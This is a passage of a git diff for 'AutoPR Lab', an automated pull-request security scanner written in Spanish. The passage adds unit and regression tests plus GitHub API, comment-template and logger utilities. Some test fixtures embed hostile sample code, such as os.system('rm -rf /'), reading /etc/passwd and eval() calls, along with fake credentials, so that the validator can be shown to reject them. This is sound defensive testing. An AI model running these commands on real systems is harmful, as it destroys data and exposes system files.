self.detector.analyze("example.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + + +class TestSensitiveFilesDetector(unittest.TestCase): + def setUp(self): + self.detector = SensitiveFilesDetector() + + def test_detects_env_file(self): + content = "API_KEY=real_value_123\nDB_PASS=secret" + results = self.detector.analyze(".env", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_detects_env_production(self): + content = "PROD_SECRET=actualvalue123" + results = self.detector.analyze(".env.production", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_detects_private_key_content(self): + content = "-----BEGIN PRIVATE KEY-----\nMIIEvgIBADANBgkq...\n-----END PRIVATE KEY-----" + results = self.detector.analyze("any_file.txt", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_detects_aws_credentials_file(self): + content = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE" + results = self.detector.analyze(".aws/credentials", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_warns_on_template_file(self): + content = "API_KEY=YOUR_API_KEY_HERE\nDB_PASS=your_password_here" + results = self.detector.analyze(".env.example", content) + # Template sin valores reales = WARNING, no ERROR + statuses = [r.status for r in results] + self.assertIn(DetectorStatus.WARNING, statuses) + self.assertNotIn(DetectorStatus.ERROR, statuses) + + def test_error_on_template_with_real_values(self): + content = "-----BEGIN RSA PRIVATE KEY-----\nrealkey..." + results = self.detector.analyze(".env.example", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_normal_python_file_is_ok(self): + content = "def hello():\n return 'Hello, World!'" + results = self.detector.analyze("hello.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + + +class TestDetectorFormatValidator(unittest.TestCase): + def setUp(self): + from detectors.detector_validator import DetectorFormatValidator + + self.validator = DetectorFormatValidator() + + def test_valid_detector_structure(self): + content = """ +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + +class MyDetector(BaseDetector): + @property + def name(self): return "MyDetector" + + @property + def description(self): return "Test detector" + + @property + def severity(self): return "medium" + + def analyze(self, file_path: str, content: str) -> List[DetectorResult]: + return [] +""" + results = self.validator.analyze("detectors/my_detector.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + + def test_rejects_subprocess_import(self): + content = """ +import subprocess +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + +class MaliciousDetector(BaseDetector): + @property + def name(self): return "MaliciousDetector" + @property + def description(self): return "Bad detector" + @property + def severity(self): return "low" + def analyze(self, fp, content): return [] +""" + results = self.validator.analyze("detectors/malicious.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue(len(errors) > 0) + + def test_rejects_eval_usage(self): + content = """ +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + +class EvalDetector(BaseDetector): + @property + def name(self): return "EvalDetector" + @property + def description(self): return "Uses eval" + @property + def severity(self): return "low" + def analyze(self, fp, content): + eval(content) # PELIGROSO + return [] +""" + results = self.validator.analyze("detectors/eval_detector.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue(len(errors) > 0) + + def test_rejects_missing_base_class(self): + content = """ +class NotADetector: + def analyze(self, fp, content): + return [] +""" + results = self.validator.analyze("detectors/not_a_detector.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue(len(errors) > 0) + + +if __name__ == "__main__": + # Colorear output de tests + import unittest + + loader = unittest.TestLoader() + suite = unittest.TestSuite() + + for test_class in [ + TestAPIKeysDetector, + TestPasswordsDetector, + TestSensitiveFilesDetector, + TestDetectorFormatValidator, + ]: + tests = loader.loadTestsFromTestCase(test_class) + suite.addTests(tests) + + runner = unittest.TextTestRunner(verbosity=2) + result = runner.run(suite) + sys.exit(0 if result.wasSuccessful() else 1) diff --git a/tests/test_scanner.py b/tests/test_scanner.py new file mode 100644 index 0000000..1604b9c --- /dev/null +++ b/tests/test_scanner.py @@ -0,0 +1,208 @@ +""" +AutoPR Lab - Tests para el Scanner +===================================== +Tests de integración para el motor principal de análisis. +""" + +import os +import sys + +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +import unittest + +from core.scanner import Scanner, SecurityRules + + +class TestSecurityRules(unittest.TestCase): + """Tests para las reglas de seguridad de paths.""" + + def test_allowed_paths_accepted(self): + files = [ + "detectors/my_new_detector.py", + "tests/test_my_detector.py", + "docs/guide.md", + ] + is_valid, violations = SecurityRules.validate_paths(files) + self.assertTrue(is_valid, f"Debería ser válido. Violations: {violations}") + self.assertEqual(len(violations), 0) + + def test_forbidden_core_path_blocked(self): + files = ["core/scanner.py"] + is_valid, violations = SecurityRules.validate_paths(files) + self.assertFalse(is_valid) + self.assertTrue(len(violations) > 0) + + def test_forbidden_workflow_path_blocked(self): + files = [".github/workflows/auto-pr.yml"] + is_valid, violations = SecurityRules.validate_paths(files) + self.assertFalse(is_valid) + self.assertTrue(len(violations) > 0) + + def test_forbidden_requirements_blocked(self): + files = ["requirements.txt"] + is_valid, violations = SecurityRules.validate_paths(files) + self.assertFalse(is_valid) + + def test_mixed_allowed_and_forbidden(self): + files = [ + "detectors/new_detector.py", # OK + "core/scanner.py", # FORBIDDEN + ] + is_valid, violations = SecurityRules.validate_paths(files) + self.assertFalse(is_valid) + self.assertEqual(len(violations), 1) + + def test_size_limit_files(self): + is_valid, violations = SecurityRules.validate_size( + num_files=SecurityRules.MAX_FILES + 1, lines_changed=10 + ) + self.assertFalse(is_valid) + self.assertTrue(len(violations) > 0) + + def test_size_limit_lines(self): + is_valid, violations = SecurityRules.validate_size( + num_files=1, lines_changed=SecurityRules.MAX_LINES_CHANGED + 1 + ) + self.assertFalse(is_valid) + + def test_size_within_limits(self): + is_valid, violations = SecurityRules.validate_size( + num_files=3, lines_changed=100 + ) + self.assertTrue(is_valid) + self.assertEqual(len(violations), 0) + + +class TestScannerIntegration(unittest.TestCase): + """Tests de integración del scanner completo.""" + + def setUp(self): + self.scanner = Scanner() + + def test_clean_detector_gets_merge(self): + """Un detector limpio y válido debe resultar en MERGE.""" + changed_files = { + "detectors/my_clean_detector.py": """ +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + +class MyCleanDetector(BaseDetector): + @property + def name(self): return "MyCleanDetector" + @property + def description(self): return "A clean detector" + @property + def severity(self): return "low" + def analyze(self, file_path: str, content: str) -> List[DetectorResult]: + return [] +""", + "tests/test_my_clean_detector.py": """ +import unittest +class TestMyCleanDetector(unittest.TestCase): + def test_basic(self): + self.assertTrue(True) +""", + } + + result = self.scanner.scan_pr( + pr_number=1, + changed_files=changed_files, + lines_changed=30, + ) + + self.assertEqual(result.global_status, "OK") + self.assertEqual(result.decision, "MERGE") + self.assertEqual(result.errors, 0) + + def test_api_key_in_detector_gets_rejected(self): + """Un detector con API key hardcodeada debe ser rechazado.""" + changed_files = { + "detectors/bad_detector.py": """ +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + +OPENAI_KEY = "sk-abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk" + +class BadDetector(BaseDetector): + @property + def name(self): return "BadDetector" + @property + def description(self): return "Has a hardcoded key" + @property + def severity(self): return "low" + def analyze(self, fp, content): return [] +""", + } + + result = self.scanner.scan_pr( + pr_number=2, + changed_files=changed_files, + lines_changed=15, + ) + + self.assertEqual(result.global_status, "ERROR") + self.assertEqual(result.decision, "REJECT") + self.assertGreater(result.errors, 0) + + def test_core_modification_gets_rejected(self): + """Modificar /core/ debe ser rechazado independientemente del contenido.""" + changed_files = { + "core/scanner.py": "# Perfectly clean code\nprint('hello')", + } + + result = self.scanner.scan_pr( + pr_number=3, + changed_files=changed_files, + lines_changed=2, + ) + + self.assertEqual(result.decision, "REJECT") + self.assertFalse(result.path_validation.get("paths_ok", True)) + + def test_workflow_modification_gets_rejected(self): + """Modificar workflows de GitHub Actions debe ser rechazado.""" + changed_files = { + ".github/workflows/auto-pr.yml": "name: Malicious workflow", + } + + result = self.scanner.scan_pr( + pr_number=4, + changed_files=changed_files, + lines_changed=1, + ) + + self.assertEqual(result.decision, "REJECT") + + def test_env_file_gets_rejected(self): + """Incluir .env en el PR debe resultar en REJECT.""" + changed_files = { + ".env": "API_KEY=real_secret_value\nDB_PASSWORD=actual_password", + } + + result = self.scanner.scan_pr( + pr_number=5, + changed_files=changed_files, + lines_changed=2, + ) + + self.assertEqual(result.decision, "REJECT") + + def test_result_has_required_fields(self): + """El resultado debe tener todos los campos requeridos.""" + result = self.scanner.scan_pr( + pr_number=99, + changed_files={"docs/readme.md": "# Documentation"}, + lines_changed=1, + ) + + self.assertIsNotNone(result.global_status) + self.assertIsNotNone(result.decision) + self.assertIsNotNone(result.detectors_run) + self.assertIsInstance(result.detectors_run, list) + self.assertGreater(len(result.detectors_run), 0) + self.assertIsNotNone(result.timestamp) + + +if __name__ == "__main__": + unittest.main(verbosity=2) diff --git a/tests/test_security_gaps.py b/tests/test_security_gaps.py new file mode 100644 index 0000000..b12bc6e --- /dev/null +++ b/tests/test_security_gaps.py @@ -0,0 +1,136 @@ +""" +AutoPR Lab - Security Regression Tests +======================================== +Valida que el DetectorFormatValidator bloquee correctamente nuevos vectores de ataque. +""" + +import os +import sys + +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +import unittest + +from detectors.base_detector import DetectorStatus +from detectors.detector_validator import DetectorFormatValidator + + +class TestSecurityRegression(unittest.TestCase): + def setUp(self): + self.validator = DetectorFormatValidator() + + def test_rejects_os_system_call(self): + content = """ +import os +from detectors.base_detector import BaseDetector + +class AttackDetector(BaseDetector): + @property + def name(self): return "Attack" + @property + def description(self): return "x" + @property + def severity(self): return "low" + def analyze(self, fp, content): + os.system("rm -rf /") # DEBE SER RECHAZADO + return [] +""" + results = self.validator.analyze("detectors/attack.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue( + any("system()" in r.message for r in errors), + "Debería haber bloqueado os.system()", + ) + + def test_rejects_subprocess_run(self): + content = """ +import subprocess +from detectors.base_detector import BaseDetector + +class AttackDetector(BaseDetector): + @property + def name(self): return "Attack" + @property + def description(self): return "x" + @property + def severity(self): return "low" + def analyze(self, fp, content): + subprocess.run(["ls"]) # DEBE SER RECHAZADO + return [] +""" + results = self.validator.analyze("detectors/attack2.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue( + any("run()" in r.message for r in errors), + "Debería haber bloqueado subprocess.run()", + ) + + def test_rejects_shutil_import(self): + content = """ +import shutil +from detectors.base_detector import BaseDetector + +class AttackDetector(BaseDetector): + @property + def name(self): return "Attack" + @property + def description(self): return "x" + @property + def severity(self): return "low" + def analyze(self, fp, content): + return [] +""" + results = self.validator.analyze("detectors/attack3.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue( + any("shutil" in r.message for r in errors), + "Debería haber bloqueado import shutil", + ) + + def test_rejects_pickle_import(self): + content = """ +import pickle +from detectors.base_detector import BaseDetector + +class AttackDetector(BaseDetector): + @property + def name(self): return "Attack" + @property + def description(self): return "x" + @property + def severity(self): return "low" + def analyze(self, fp, content): + return [] +""" + results = self.validator.analyze("detectors/attack4.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue( + any("pickle" in r.message for r in errors), + "Debería haber bloqueado import pickle", + ) + + def test_rejects_builtin_open(self): + content = """ +from detectors.base_detector import BaseDetector + +class AttackDetector(BaseDetector): + @property + def name(self): return "Attack" + @property + def description(self): return "x" + @property + def severity(self): return "low" + def analyze(self, fp, content): + with open("/etc/passwd") as f: # DEBE SER RECHAZADO + pass + return [] +""" + results = self.validator.analyze("detectors/attack5.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue( + any("open()" in r.message for r in errors), "Debería haber bloqueado open()" + ) + + +if __name__ == "__main__": + unittest.main() diff --git a/utils/__init__.py b/utils/__init__.py new file mode 100644 index 0000000..299d01f --- /dev/null +++ b/utils/__init__.py @@ -0,0 +1,17 @@ +"""AutoPR Lab - Utils Package""" + +from utils.comment_templates import ( + build_merge_comment, + build_reject_comment, + build_warn_merge_comment, +) +from utils.github_api import GitHubAPI +from utils.logger import get_logger + +__all__ = [ + "get_logger", + "GitHubAPI", + "build_merge_comment", + "build_warn_merge_comment", + "build_reject_comment", +] diff --git a/utils/comment_templates.py b/utils/comment_templates.py new file mode 100644 index 0000000..6cd4f2d --- /dev/null +++ b/utils/comment_templates.py @@ -0,0 +1,186 @@ +""" +AutoPR Lab - Comment Templates +================================ +Plantillas para los comentarios automáticos del bot en PRs. +""" + +from typing import Any + + +def _findings_section(findings: list[dict]) -> str: + """Genera la sección de hallazgos agrupados por estado.""" + if not findings: + return "_No se encontraron problemas._\n" + + errors = [f for f in findings if f["status"] == "ERROR"] + warnings = [f for f in findings if f["status"] == "WARNING"] + + lines = [] + + if errors: + lines.append("**❌ Errores críticos:**") + for f in errors: + loc = f"en `{f['file_path']}`" if f.get("file_path") else "" + line_ref = f", línea {f['line_number']}" if f.get("line_number") else "" + lines.append(f"- **{f['detector_name']}**: {f['message']} {loc}{line_ref}") + for detail in f.get("details", []): + lines.append(f" - {detail}") + lines.append("") + + if warnings: + lines.append("**⚠️ Advertencias:**") + for f in warnings: + loc = f"en `{f['file_path']}`" if f.get("file_path") else "" + lines.append(f"- **{f['detector_name']}**: {f['message']} {loc}") + for detail in f.get("details", []): + lines.append(f" - {detail}") + lines.append("") + + return "\n".join(lines) + + +def _path_violations_section(path_validation: dict) -> str: + """Genera la sección de violaciones de paths.""" + violations = path_validation.get("violations", []) + if not violations: + return "" + + lines = ["**🛡️ Violaciones de reglas de seguridad:**"] + for v in violations: + lines.append(f"- {v}") + lines.append("") + return "\n".join(lines) + + +def build_merge_comment(result: Any) -> str: + """Comentario cuando el PR es mergeado exitosamente.""" + return f"""## 🤖 AutoPR Lab — Análisis Completado + +### ✅ DECISIÓN: MERGE AUTOMÁTICO APROBADO + +El PR cumple todos los requisitos de seguridad y calidad. + +--- + +### 📊 Resumen del Análisis + +| Métrica | Valor | +|---------|-------| +| Archivos analizados | `{result.files_analyzed}` | +| Detectores ejecutados | `{len(result.detectors_run)}` | +| Errores | `0` | +| Advertencias | `0` | +| Tiempo de análisis | `{result.scan_duration_ms:.0f}ms` | + +### 🔍 Detectores ejecutados +{chr(10).join(f"- ✅ `{d}`" for d in result.detectors_run)} + +--- + +> 🔀 **Este PR ha sido mergeado automáticamente** por AutoPR Lab. +> _Análisis completado: {result.timestamp}_ +""" + + +def build_warn_merge_comment(result: Any) -> str: + """Comentario cuando el PR es mergeado con advertencias.""" + findings_text = _findings_section(result.findings) + + return f"""## 🤖 AutoPR Lab — Análisis Completado + +### ⚠️ DECISIÓN: MERGE CON ADVERTENCIAS + +El PR fue mergeado automáticamente pero se detectaron advertencias no críticas. + +--- + +### 📊 Resumen del Análisis + +| Métrica | Valor | +|---------|-------| +| Archivos analizados | `{result.files_analyzed}` | +| Errores | `0` ✅ | +| Advertencias | `{result.warnings}` ⚠️ | +| Tiempo de análisis | `{result.scan_duration_ms:.0f}ms` | + +### ⚠️ Hallazgos (no críticos) + +{findings_text} + +### ℹ️ Nota +Las advertencias no bloquean el merge pero se recomienda revisarlas en el futuro. + +--- + +> 🔀 **Este PR ha sido mergeado automáticamente** a pesar de las advertencias. +> _Análisis completado: {result.timestamp}_ +""" + + +def build_reject_comment(result: Any) -> str: + """Comentario cuando el PR es rechazado.""" + findings_text = _findings_section(result.findings) + path_text = _path_violations_section(result.path_validation) + + reasons_list = [] + if result.errors > 0: + reasons_list.append( + f"Se encontraron **{result.errors} error(es) crítico(s)** en el análisis de seguridad" + ) + if not result.path_validation.get("paths_ok", True): + reasons_list.append( + "El PR modifica **archivos o rutas no permitidas** para auto-merge" + ) + if not result.path_validation.get("size_ok", True): + reasons_list.append( + "El PR **excede los límites de tamaño** permitidos para auto-merge" + ) + + reasons_text = "\n".join(f"- {r}" for r in reasons_list) + + return f"""## 🤖 AutoPR Lab — Análisis Completado + +### ❌ DECISIÓN: PR RECHAZADO Y CERRADO + +Este PR ha sido cerrado automáticamente por las siguientes razones: + +{reasons_text} + +--- + +### 📊 Resumen del Análisis + +| Métrica | Valor | +|---------|-------| +| Archivos analizados | `{result.files_analyzed}` | +| Errores críticos | `{result.errors}` ❌ | +| Advertencias | `{result.warnings}` ⚠️ | +| Tiempo de análisis | `{result.scan_duration_ms:.0f}ms` | + +--- + +{path_text} + +### 🔍 Problemas Detectados + +{findings_text} + +--- + +### 🔧 ¿Cómo corregir este PR? + +1. **Revisa los errores listados** y corrígelos en tu branch +2. **Asegúrate de que los archivos modificados** solo estén en rutas permitidas: + - ✅ `/detectors/` — Para agregar nuevos detectores + - ✅ `/tests/` — Para tests + - ✅ `/docs/` — Para documentación +3. **Nunca incluyas** API keys, passwords o archivos sensibles en el código +4. **Abre un nuevo PR** una vez corregidos los problemas +5. Para cambios en `/core/` o workflows, [abre un issue](../../issues/new) para revisión manual + +--- + +> 🚫 **Este PR ha sido cerrado automáticamente** por AutoPR Lab. +> _Para apelar esta decisión, contacta a los maintainers del proyecto._ +> _Análisis completado: {result.timestamp}_ +""" diff --git a/utils/github_api.py b/utils/github_api.py new file mode 100644 index 0000000..f39eb77 --- /dev/null +++ b/utils/github_api.py @@ -0,0 +1,221 @@ +""" +AutoPR Lab - GitHub API Client +================================ +Wrapper para operaciones de la GitHub API: +aprobar, rechazar, mergear y comentar en PRs. +""" + +import json +import urllib.error +import urllib.request +from typing import Any, cast + +from utils.logger import get_logger + +logger = get_logger("github_api") + + +class GitHubAPIError(Exception): + """Error de la API de GitHub.""" + + def __init__(self, message: str, status_code: int = 0, response: str = ""): + super().__init__(message) + self.status_code = status_code + self.response = response + + +class GitHubAPI: + """ + Cliente para la GitHub REST API v3. + Usa solo módulos de la biblioteca estándar (sin requests). + """ + + BASE_URL = "https://api.github.com" + + def __init__(self, token: str, repo: str, pr_number: int): + """ + Args: + token: GitHub token (GITHUB_TOKEN del workflow) + repo: Repositorio en formato "owner/repo" + pr_number: Número del Pull Request + """ + self.token = token + self.repo = repo + self.pr_number = pr_number + + def _request( + self, + method: str, + endpoint: str, + body: dict[str, Any] | None = None, + accept: str = "application/vnd.github+json", + ) -> Any: + """Realiza una petición a la GitHub API.""" + url = f"{self.BASE_URL}/{endpoint.lstrip('/')}" + headers = { + "Authorization": f"Bearer {self.token}", + "Accept": accept, + "X-GitHub-Api-Version": "2022-11-28", + "Content-Type": "application/json", + "User-Agent": "AutoPR-Lab/1.0", + } + + data = json.dumps(body).encode("utf-8") if body else None + req = urllib.request.Request(url, data=data, headers=headers, method=method) + + try: + with urllib.request.urlopen(req) as response: + response_body = response.read().decode("utf-8") + return json.loads(response_body) if response_body.strip() else {} + except urllib.error.HTTPError as e: + error_body = e.read().decode("utf-8") + raise GitHubAPIError( + f"GitHub API {method} {url} → {e.code}: {error_body}", + status_code=e.code, + response=error_body, + ) from e + + # ── Información del PR ────────────────────────────────────────────── + + def get_pr_info(self) -> dict[str, Any]: + """Obtiene información del PR.""" + return cast(dict[str, Any], self._request("GET", f"repos/{self.repo}/pulls/{self.pr_number}")) + + def get_changed_files(self) -> list[dict[str, Any]]: + """Obtiene lista de archivos modificados en el PR.""" + files = [] + page = 1 + while True: + result = self._request( + "GET", + f"repos/{self.repo}/pulls/{self.pr_number}/files?per_page=100&page={page}", + ) + if not result: + break + files.extend(result) + if len(result) < 100: + break + page += 1 + return files + + def get_file_content(self, raw_url: str) -> str: + """Descarga el contenido de un archivo del PR usando su raw_url.""" + req = urllib.request.Request( + raw_url, + headers={ + "Authorization": f"Bearer {self.token}", + "User-Agent": "AutoPR-Lab/1.0", + }, + ) + try: + with urllib.request.urlopen(req) as response: + return cast(str, response.read().decode("utf-8", errors="replace")) + except Exception as e: + logger.warning(f"No se pudo descargar {raw_url}: {e}") + return "" + + def get_file_content_by_path(self, path: str, ref: str) -> str: + """ + Descarga el contenido de un archivo usando la API de contenidos. + Útil si no se dispone de raw_url o para una revisión específica. + """ + import base64 + + try: + result = self._request( + "GET", f"repos/{self.repo}/contents/{path}?ref={ref}" + ) + content_b64 = result.get("content", "") + if content_b64: + return base64.b64decode(content_b64).decode("utf-8", errors="replace") + except Exception as e: + logger.warning(f"No se pudo descargar {path} en {ref}: {e}") + return "" + + # ── Acciones sobre el PR ──────────────────────────────────────────── + + def add_comment(self, body: str) -> dict[str, Any]: + """Agrega un comentario al PR.""" + logger.info(f"💬 Agregando comentario al PR #{self.pr_number}") + return cast(dict[str, Any], self._request( + "POST", + f"repos/{self.repo}/issues/{self.pr_number}/comments", + body={"body": body}, + )) + + def approve_pr( + self, message: str = "AutoPR Lab: ✅ Aprobado automáticamente" + ) -> dict[str, Any]: + """Aprueba el PR con un review.""" + logger.info(f"✅ Aprobando PR #{self.pr_number}") + return cast(dict[str, Any], self._request( + "POST", + f"repos/{self.repo}/pulls/{self.pr_number}/reviews", + body={"body": message, "event": "APPROVE"}, + )) + + def request_changes(self, message: str) -> dict[str, Any]: + """Solicita cambios en el PR (REQUEST_CHANGES review).""" + logger.info(f"❌ Solicitando cambios en PR #{self.pr_number}") + return cast(dict[str, Any], self._request( + "POST", + f"repos/{self.repo}/pulls/{self.pr_number}/reviews", + body={"body": message, "event": "REQUEST_CHANGES"}, + )) + + def merge_pr( + self, + commit_title: str | None = None, + commit_message: str | None = None, + merge_method: str = "squash", + ) -> dict[str, Any]: + """ + Hace merge del PR. + + Args: + merge_method: "merge" | "squash" | "rebase" + """ + logger.info(f"🔀 Mergeando PR #{self.pr_number} con método '{merge_method}'") + + pr_info = self.get_pr_info() + sha = pr_info.get("head", {}).get("sha", "") + + body = { + "merge_method": merge_method, + "sha": sha, + } + if commit_title: + body["commit_title"] = commit_title + if commit_message: + body["commit_message"] = commit_message + + try: + return cast(dict[str, Any], self._request( + "PUT", + f"repos/{self.repo}/pulls/{self.pr_number}/merge", + body=body, + )) + except GitHubAPIError as e: + if e.status_code == 405: + raise GitHubAPIError( + "El PR no puede ser mergeado (puede estar desactualizado o tener conflictos)", + status_code=e.status_code, + ) from e + raise + + def close_pr(self) -> dict[str, Any]: + """Cierra el PR sin hacer merge.""" + logger.info(f"🚫 Cerrando PR #{self.pr_number}") + return cast(dict[str, Any], self._request( + "PATCH", + f"repos/{self.repo}/pulls/{self.pr_number}", + body={"state": "closed"}, + )) + + def add_label(self, label: str) -> dict[str, Any]: + """Agrega un label al PR.""" + return cast(dict[str, Any], self._request( + "POST", + f"repos/{self.repo}/issues/{self.pr_number}/labels", + body={"labels": [label]}, + )) diff --git a/utils/logger.py b/utils/logger.py new file mode 100644 index 0000000..af016fd --- /dev/null +++ b/utils/logger.py @@ -0,0 +1,64 @@ +""" +AutoPR Lab - Logger +===================== +Sistema de logging centralizado con formato consistente y colores. +""" + +import logging +import os +import sys + +# Colores ANSI para terminal +RESET = "\033[0m" +BOLD = "\033[1m" +RED = "\033[91m" +YELLOW = "\033[93m" +GREEN = "\033[92m" +BLUE = "\033[94m" +CYAN = "\033[96m" +GRAY = "\033[90m" + + +class ColoredFormatter(logging.Formatter): + """Formatter con colores para output de terminal.""" + + LEVEL_COLORS = { + logging.DEBUG: GRAY, + logging.INFO: CYAN, + logging.WARNING: YELLOW, + logging.ERROR: RED, + logging.CRITICAL: f"{BOLD}{RED}", + } + + def format(self, record: logging.LogRecord) -> str: + color = self.LEVEL_COLORS.get(record.levelno, RESET) + level_str = f"{color}{record.levelname:8}{RESET}" + name_str = f"{BLUE}{record.name}{RESET}" + return f"{level_str} {name_str} | {record.getMessage()}" + + +def get_logger(name: str, level: int | None = None) -> logging.Logger: + """ + Obtiene un logger configurado para AutoPR Lab. + + Args: + name: Nombre del módulo (ej: "scanner", "github_api") + level: Nivel de logging (default: INFO, o DEBUG si LOG_LEVEL=DEBUG) + """ + logger = logging.getLogger(f"autopr.{name}") + + if logger.handlers: + return logger + + if level is None: + env_level = os.environ.get("LOG_LEVEL", "INFO").upper() + level = getattr(logging, env_level, logging.INFO) + + logger.setLevel(level) + + handler = logging.StreamHandler(sys.stdout) + handler.setFormatter(ColoredFormatter()) + logger.addHandler(handler) + logger.propagate = False + + return logger